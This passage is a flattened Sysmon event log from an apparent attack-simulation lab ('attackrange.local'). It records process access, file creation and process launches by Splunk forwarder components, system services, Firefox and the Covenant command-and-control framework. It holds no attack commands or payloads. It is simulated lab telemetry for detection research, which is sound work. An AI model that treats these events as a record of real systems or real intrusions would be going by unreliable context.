Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000149979Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.840{39BD8DE3-70A7-60CA-0E0D-00000000D101}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149978Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.974{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149977Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.967{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149976Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.907{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149975Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.892{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149974Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.876{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-walMD5=659998F9072BF4E5429DD068F6407125,SHA256=CB8507A87C70CEA64B31D27AB9418727B874808A0329174C7B120176D7B1AF09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149973Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.876{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=8B9FE8DE4C0EC3B14690DE96BEFAE8B8,SHA256=89A6753A265CEBF576DDB8AC8B8348A7D456DA873E1B5700785DE686EC3EA6D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149972Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.607{39BD8DE3-480D-60CA-F607-00000000D101}5112NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149971Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.507{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2278B1A370DE8FCE00003BA463265485,SHA256=BF5561C6907B2AABF244BFFD1B856E0060E15167B075598336714575F7876529,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149970Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.357{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0563EB7E8BE68AE970C695A1F1ABC6F0,SHA256=8B8253262C5BF8F589512632262555F0D5037A6426FDF3BAB90648A143754FF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149969Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.075{39BD8DE3-709A-60CA-080D-00000000D101}4924WIN-HOST-14\AdministratorC:\Program Files\dotnet\dotnet.exeC:\Users\Administrator\AppData\Local\Microsoft\dotnet\optimizationdata\3.1.410\win10-x64\dotnetMD5=319E21B485CA9DA80D8BEB602E9A484F,SHA256=F5354A9DD3CBCBE08840D77B1AE3677591566C3E4E88324956B2C1F7361C34AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104612Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:08.998{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D8F62DCA14C5927DACF1EB919A34295,SHA256=F6DEFCBA13853995A72293E3B0ADC3F68DBBD283D4B2F565A28E634B3E9EBEC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150006Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.958{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFEDA12B78D5B2186C4E8224AB86C211,SHA256=57310672124A34A166C96D976378B0177CACCA7F76EC7737C567B999BD8802CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150005Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.727{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70A8-60CA-0F0D-00000000D101}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150004Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.727{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150003Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.727{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150002Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.727{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150001Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.727{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150000Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.727{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-70A8-60CA-0F0D-00000000D101}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149999Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.727{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70A8-60CA-0F0D-00000000D101}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000149998Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.728{39BD8DE3-70A8-60CA-0F0D-00000000D101}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149997Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.511{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8B0E4330F6D3AB81A3CBD61C8CAA311,SHA256=B7C634AEB148C41BBFC3C9E263DCF718DA00A338E829A6C1D3A6447221FFD22E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149996Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.243{39BD8DE3-70A7-60CA-0E0D-00000000D101}67486228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149995Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.074{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149994Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.074{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149993Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.058{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149992Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.058{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149991Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.058{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149990Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.058{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149989Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:08.058{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150025Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.916{39BD8DE3-70A9-60CA-100D-00000000D101}68767116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150024Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.754{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBC3CB5FCA46A5CA069F491E166CAA0B,SHA256=6C73DF57F1C73C65A0DA565010F2E49819724F820C2B1A59E98808D020CF473D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150023Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.733{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=250D04DA58D18E63CF8D5498DE0A1544,SHA256=FC519D27C6992F9431B2F2BBD0968F821E2B971F2B38424728D05ADC468D25AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150022Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.732{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=48E1295AAB711898FB10E8F3E44BE916,SHA256=7C330B2BB6BFCC9C060DC17AB7705BDA748E3DFA5761BA7952FABB681E8D89AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150021Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.716{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=0BB07930CA6C4E97DD17F966A6F11BD9,SHA256=B5517B4509E84EAC0439F0769BC6BF9109FF15999DCCD3736E5C9F3588265672,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150020Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.716{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=942B9DD99BAAF8206E6B5E4F9DF6FB2C,SHA256=FCD2C91696556CCA5B9C502E629D5D2214000EA833AB2C5F26184841164DAE37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150019Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.716{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=2D6D11FA83DB93BB5298E019DA011CB2,SHA256=7938903240DE92276C72988FB16C8BE4DDDDCE0A9EAA5954F0CBD79E00123318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150018Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.716{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=2397F1B10F94524AD84D6301F6E31B93,SHA256=CD44501EC0AE399F6D30D282773D1644454A81871B762FA3E5083EED9DC91BB3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150017Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.585{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70A9-60CA-100D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150016Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.585{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150015Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 